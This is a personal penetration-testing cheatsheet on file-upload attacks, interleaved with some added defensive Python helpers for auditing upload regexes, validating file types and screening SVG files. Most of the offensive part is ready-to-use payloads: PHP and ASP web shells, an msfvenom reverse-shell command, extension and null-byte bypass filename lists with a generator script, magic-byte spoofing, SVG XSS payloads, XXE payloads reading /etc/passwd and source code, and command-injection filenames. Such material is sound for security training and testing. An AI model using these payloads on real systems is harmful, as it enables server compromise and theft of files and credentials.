These cheatsheets serve as my personal quick reference. Therefore, they’re less organized than the box walkthroughs, but I’ve shared them in case others find them useful.
Web Shells
https://github.com/Arrexel/phpbash
<?php system($_REQUEST['cmd']); ?>
.NET applications
<% eval request('cmd') %>
Reverse Shells
https://github.com/pentestmonkey/php-reverse-shell
Custom Reverse shells (msfvenom)
The -p flag selects the payload (and therefore the language):
msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php
Frontend Filtering
Check the HTML for client-side validation functions and remove or bypass them with Burp Suite: upload a file that is allowed, intercept the request and change the body to a web shell or reverse shell.
Backend Filtering
Blacklist Bypass
Example of blacklist backend code:
$fileName = basename($_FILES["uploadFile"]["name"]);
$extension = pathinfo($fileName, PATHINFO_EXTENSION);
$blacklist = array('php', 'php7', 'phps');
if (in_array($extension, $blacklist)) {
echo "File type not allowed";
die();
}
NOTE: Linux is case sensitive --> the blacklist can be bypassed by playing with capital letters in the extension. On Windows this will not work.
Fuzzing for allowed extensions using Burp Suite Intruder:
Wordlists to use:
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Extension%20PHP/extensions.lst
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Extension%20ASP
https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/web-extensions.txt
Note: don't forget to untick URL-encode in Intruder (the . must not be URL-encoded).
Whitelist Bypass
Vulnerable Regex:
$fileName = basename($_FILES["uploadFile"]["name"]);
// Delimiters added so preg_match() actually runs; the missing "$" anchor is the intended bug.
if (!preg_match('/^.*\.(jpg|jpeg|png|gif)/', $fileName)) {
    echo "Only images are allowed";
    die();
}
This pattern checks whether the filename contains the "jpg", "jpeg", "png" or "gif" extension but it does not check whether it ends with it (the "$" character is not included at the end).
The following could work in these cases:
.jpeg.php
.jpg.php
.png.ph
.php%00.gif
.php\x00.gif
.php%00.png
.php\x00.png
.php%00.jpg
.php\x00.jpg
Reverse Double Extension
The file /etc/apache2/mods-enabled/php7.4.conf for the Apache2 web server may include the following configuration:
<FilesMatch ".+\.ph(ar|p|tml)">
SetHandler application/x-httpd-php
</FilesMatch>
This determines which files are allowed to execute PHP code. The same mistake is made: it matches files that CONTAIN ".php", ".phar" or ".phtml", NOT only files that END WITH them. Therefore, the following works, as these extensions are in the name but not at the end (assuming that files ending in .php or similar are filtered):
shell.php.jpg (and similar)
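Added audit helper (not from the page) that runs the two unanchored regexes above, the PHP whitelist and the Apache FilesMatch handler, against sample filenames next to "$"-anchored versions; Python's re stands in for PCRE here because these patterns behave identically in both:

```python
import re

# Regexes copied from the page. Without a trailing "$" they test
# "contains .jpg" / "contains .php" rather than "ends with".
UPLOAD_FILTER_VULN = re.compile(r'^.*\.(jpg|jpeg|png|gif)')
APACHE_HANDLER_VULN = re.compile(r'.+\.ph(ar|p|tml)')

# Fixed variants (my suggestion, not from the page): anchor with "$" so only the
# real last extension counts. The whitelist is made case-insensitive so that
# "photo.JPG" is accepted deliberately instead of by accident.
UPLOAD_FILTER_FIXED = re.compile(r'^.*\.(jpg|jpeg|png|gif)$', re.IGNORECASE)
APACHE_HANDLER_FIXED = re.compile(r'.+\.ph(ar|p|tml)$')


def upload_accepted(filename, pattern=UPLOAD_FILTER_VULN):
    """Mirrors preg_match(): True if the upload filter lets the name through."""
    return pattern.search(filename) is not None


def runs_as_php(filename, pattern=APACHE_HANDLER_VULN):
    """Mirrors Apache FilesMatch: True if the file is handed to the PHP engine."""
    return pattern.search(filename) is not None


def reachable_code_exec(filename, filter_pat=UPLOAD_FILTER_VULN,
                        handler_pat=APACHE_HANDLER_VULN):
    """The dangerous combination: accepted by the filter AND executed as PHP."""
    return upload_accepted(filename, filter_pat) and runs_as_php(filename, handler_pat)


def audit(filenames):
    """Per filename: would the vulnerable stack and the fixed stack execute it?"""
    return {
        name: {
            "vulnerable": reachable_code_exec(name),
            "fixed": reachable_code_exec(name, UPLOAD_FILTER_FIXED, APACHE_HANDLER_FIXED),
        }
        for name in filenames
    }


if __name__ == "__main__":
    # Constructed sample names taken from the bypass lists on this page.
    for name, res in audit(["shell.php.jpg", "shell.jpg.php", "photo.jpg", "photo.JPG"]).items():
        print(f"{name:15} vulnerable={res['vulnerable']!s:5} fixed={res['fixed']}")
```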
Character Injection
Characters to try:
%20 %0a %00 %0d0a / .\ . … :
Custom script to generate a wordlist:
# Generates every combination of injected character and extension position
# ('.\' yields a single backslash, matching the list above).
for char in '%20' '%0a' '%00' '%0d0a' '/' '.\' '.' '…' ':'; do
    for ext in '.php' '.phps'; do
        echo "shell$char$ext.jpg" >> wordlist.txt   # e.g. shell%00.php.jpg
        echo "shell$ext$char.jpg" >> wordlist.txt   # e.g. shell.php%00.jpg
        echo "shell.jpg$char$ext" >> wordlist.txt   # e.g. shell.jpg%00.php
        echo "shell.jpg$ext$char" >> wordlist.txt   # e.g. shell.jpg.php%00
    done
done
These tricks rely on outdated backends or misconfigurations.
Type Filters
Example code to test Content-Type header:
$type = $_FILES['uploadFile']['type'];
if (!in_array($type, array('image/jpg', 'image/jpeg', 'image/png', 'image/gif'))) {
echo "Only images are allowed";
die();
}
Just change the Content-Type header. Can also fuzz for allowed types in Burp Suite using the content-type wordlist from SecLists.
MIME types
Magic bytes (first few bytes) indicate which file it is.
echo "this is a text file" > text.jpg
file text.jpg
text.jpg: ASCII text
The file command looks at these magic bytes to determine the file type. Even though the file has a .jpg extension, file identifies it as plain text.
Changing it to GIF while keeping the JPG extension:
echo "GIF8" > text.jpg
file text.jpg
text.jpg: GIF image data
Example of server code that checks the MIME type:
$type = mime_content_type($_FILES['uploadFile']['tmp_name']);
if (!in_array($type, array('image/jpg', 'image/jpeg', 'image/png', 'image/gif'))) {
echo "Only images are allowed";
die();
}
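Added example (not from the page) of the stricter server-side check the Type Filters and MIME types sections argue for: the extension, the declared Content-Type and the magic bytes are cross-checked against each other, and the GIF signature is required in full rather than the short "GIF8" match that fooled file above (signature table and extension map are my own choices):

```python
# Full signatures per allowed type (my choice; stricter than the short "GIF8"
# match that `file` accepted for the spoofed text.jpg above).
SIGNATURES = {
    "image/jpeg": (b"\xff\xd8\xff",),
    "image/png": (b"\x89PNG\r\n\x1a\n",),
    "image/gif": (b"GIF87a", b"GIF89a"),
}
# Permitted extensions and the MIME type the browser should declare for them.
ALLOWED_EXT = {"jpg": "image/jpeg", "jpeg": "image/jpeg", "png": "image/png", "gif": "image/gif"}


def sniff_mime(data):
    """MIME type whose full signature starts the data, or None if none matches."""
    for mime, sigs in SIGNATURES.items():
        if any(data.startswith(s) for s in sigs):
            return mime
    return None


def validate_upload(filename, declared_type, data):
    """Cross-check the three signals an upload carries: extension, Content-Type
    header and magic bytes. Returns (accepted, reason)."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    expected = ALLOWED_EXT.get(ext)
    if expected is None:
        return False, f"extension {ext!r} not allowed"
    if declared_type != expected:
        return False, f"Content-Type {declared_type!r} does not match .{ext}"
    sniffed = sniff_mime(data)
    if sniffed != expected:
        return False, f"magic bytes say {sniffed!r}, extension says {expected!r}"
    return True, expected


if __name__ == "__main__":
    # Constructed inputs mirroring the echo experiments on this page.
    samples = [
        ("text.jpg", "image/jpeg", b"this is a text file\n"),
        ("text.jpg", "image/jpeg", b"GIF8\n"),
        ("text.gif", "image/gif", b"GIF8\n"),
        ("pic.gif", "image/gif", b"GIF89a\x01\x00\x01\x00"),
    ]
    for name, ctype, body in samples:
        print(name, ctype, validate_upload(name, ctype, body))
```

A file that passes all three checks can still carry PHP after a valid GIF header, so this is a gate in front of, not a replacement for, storing uploads outside the web root under a server-generated name.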
Tip: start with a file that gets uploaded successfully, intercept it in Burp Suite and fuzz for allowed extensions from there. Then check for allowed content types and then start playing with reverse double extensions.
Limited file uploads
XSS
When you can upload HTML files, you can include JavaScript code in it that then gets executed when a victim visits the page.
When a web app shows image metadata after upload, inject an XSS payload into a metadata parameter (e.g. the Comment or Artist field):
exiftool -Comment=' "><img src=1 onerror=alert(window.origin)>' HTB.jpg
Another possibility is to change the MIME type to text/html --> rendered as HTML --> XSS executed.
SVG images are made up of XML --> add XSS payload to XML:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="1" height="1">
<rect x="1" y="1" width="1" height="1" fill="green" stroke="black" />
<script type="text/javascript">alert(window.origin);</script>
</svg>
XXE
Leak sensitive data using SVG by inserting malicious XML:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<svg>&xxe;</svg>
Get source code:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<svg>&xxe;</svg>
Note: this of course also works when XML itself can be uploaded instead of SVG. PDF, Word and PowerPoint files also use XML and can be used if the web app is vulnerable, or via exiftool metadata in JPG, GIF, JPEG and PNG.
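Added pre-check (not from the page) for the two SVG abuses above, XXE via a DOCTYPE/ENTITY declaration and stored XSS via active content; it uses only the standard library and treats any DOCTYPE as a reason to reject, since a benign SVG never needs one (rejection policy is my own choice):

```python
import xml.etree.ElementTree as ET


def svg_upload_problems(data: bytes):
    """Return the reasons to reject an uploaded SVG (empty list = none found).

    Covers the two abuses from the page: a DOCTYPE/ENTITY declaration (XXE)
    and active content (<script>, on* handlers, javascript: hrefs) for XSS.
    """
    problems = []
    head = data[:4096].lower()  # declarations sit before the root element
    if b"<!doctype" in head or b"<!entity" in head:
        problems.append("DOCTYPE/ENTITY declaration present (possible XXE)")
    try:
        root = ET.fromstring(data)  # expat does not fetch external entities
    except ET.ParseError as exc:
        return problems + [f"not well-formed XML: {exc}"]
    for el in root.iter():
        tag = el.tag.split("}", 1)[-1].lower() if isinstance(el.tag, str) else ""
        if tag == "script":
            problems.append("<script> element present")
        for attr, value in el.attrib.items():
            name = attr.split("}", 1)[-1].lower()  # strip xlink:/svg namespace
            if name.startswith("on"):
                problems.append(f"event handler attribute {name}")
            if name == "href" and value.strip().lower().startswith("javascript:"):
                problems.append("javascript: href")
    return problems


if __name__ == "__main__":
    # Constructed sample: the page's XSS SVG, trimmed to the relevant parts.
    sample = (b'<?xml version="1.0"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" '
              b'"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">'
              b'<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>')
    for p in svg_upload_problems(sample):
        print("reject:", p)
```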
Other attacks
Injections In File name
file$(whoami).jpg
file`whoami`.jpg
file.jpg||whoami
These get executed when the backend uses the filename in a system command: the injected sequence escapes the intended command and runs the new one.
XSS:
<script>alert(window.origin);</script>
Can also get executed on the victim's machine if the filename is displayed to them.
Disclose Upload Directory
XXE
Goal: try to get error messages which may disclose the upload directory:
Upload a file that already exists
Upload a file with a super long name